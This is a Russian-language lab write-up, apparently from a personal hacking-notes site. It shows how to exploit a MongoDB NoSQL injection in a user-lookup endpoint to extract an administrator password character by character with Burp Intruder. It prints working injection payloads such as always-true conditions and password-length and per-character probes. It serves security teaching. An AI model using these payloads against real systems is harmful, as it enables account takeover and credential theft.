> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/nosql-injection/data-extraction-via-nosql-injection.md).

# Извлечение данных через NoSQL-инъекцию

### Использование NoSQL-инъекции для извлечения данных

**Сведения о лабораторной работе**

Функция поиска пользователей в этой лабораторной работе основана на базе данных NoSQL **MongoDB**. / Она уязвима к \*\* NoSQL-инъекции\*\*.

\*\* Цель:\*\*/ Извлечь пароль пользователя **administrator** а затем войти в его аккаунт.

Предоставлена действующая учетная запись:

* **Идентификатор:** `wiener`
* **Пароль:** `peter`

```bash
csrf=9FxorVglwXv5ZCx4bSUi29Bge07i8pJP&username=wiener&password=peter
```

<figure><img src="/files/95604a8808040249ca1e78929e4b37b550cdf6fa" alt=""><figcaption></figcaption></figure>

**Анализ операции**

После подключения к `wiener:peter`, в фоновом режиме отправляется следующий запрос:

```bash
GET /user/lookup?user=
```

Этот запрос выводит информацию о пользователях.

* Пример:

```bash
GET /user/lookup?user=administrator
```

<figure><img src="/files/9427b1370dea98d106803b5de6e3e8edb2b7e051" alt=""><figcaption></figcaption></figure>

Затем интерфейс отображает:

```bash
Ваше имя пользователя: wiener (роль: user)
```

<figure><img src="/files/490f09c17bb1a0315a944c23e9f7866e0c1c130b" alt=""><figcaption></figcaption></figure>

**Обнаружение уязвимости NoSQL**

Вставив один апостроф:

```bash
administrator'
```

Сервер возвращает ошибку:

```terraform
{
  "message": "Произошла ошибка при получении сведений о пользователе"
}
```

<figure><img src="/files/04babdc0d4adfd2e9eed90c1751b933df845b34d" alt=""><figcaption></figcaption></figure>

Однако, добавив условие, которое всегда истинно:

```bash
administrator' || true ||'
```

Запрос принимается, подтверждая наличие \*\* NoSQL-инъекции\*\*.

**Извлечение длины пароля**

У `this.password.length` атрибут используется для определения длины пароля.

Пример проверки:

```bash
wiener' && this.password.length <40 ||'
wiener' && this.password.length == 5 ||'
```

Чтобы это работало правильно, необходимо \*\*d

```bash
wiener' %26%26 this.password.length == 5 ||'
```

\*\* Применение к Administrator\*\*

<figure><img src="/files/da09215e531759a0d20459f03bcab344ed586442" alt=""><figcaption></figcaption></figure>

Повторение метода с `administrator` пользователем:

```bash
administrator' && this.password.length == 8 ||'
administrator' %26%26 this.password.length == 8 ||'
```

Условие подтверждается, что указывает на то, что пароль администратора содержит **8 символов**.

<figure><img src="/files/d3e4c524194bcdbcf309473c4ebe76b84a5ff4cd" alt=""><figcaption></figcaption></figure>

**Извлечь по одному символу**

Затем отфильтровать по позиции:

```bash
administrator' %26%26 this.password[0]=='X
```

Этот запрос отправляется на **Intruder**.

<figure><img src="/files/71f89117cff34050508e101a05d213ed761864a1" alt=""><figcaption></figcaption></figure>

### \*\* Атака с помощью Intruder\*\*

<figure><img src="/files/9e0ee53e4db53df2bd7199adb8a21cd69e9df2c1" alt=""><figcaption></figcaption></figure>

Тип атаки: **Cluster Bomb**

<figure><img src="/files/3011b8c25e850f669203a8ba0e0d3f8379473004" alt=""><figcaption></figcaption></figure>

Параметры:

* Позиция символа: `0` на `7` значения

<figure><img src="/files/e74366ba8f1a1a5eaabfea8b5200df10363f2722" alt=""><figcaption></figcaption></figure>

* Тестируемые символы: алфавит (словарь букв)

<figure><img src="/files/9e5e0cba8bf582164aacdd3bd741201930fe47a5" alt=""><figcaption></figcaption></figure>

Анализируя правильные ответы, пароль восстанавливается.

| число | букв |
| ----- | ---- |
| 0     | v    |
| 1     | x    |
| 2     | t    |
| 3     | r    |
| 4     | m    |
| 5     | e    |
| 6     | z    |
| 7     | s    |

<figure><img src="/files/65d1b09f2a97006af825dbd84cb26f1ec241e8c5" alt=""><figcaption></figcaption></figure>

**Итоговый результат**

**Пароль пользователя Administrator:**

`vxtrmezs`

<figure><img src="/files/a219ebe4dbf8b27cc9fee73b1d6c74b198018817" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/nosql-injection/data-extraction-via-nosql-injection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
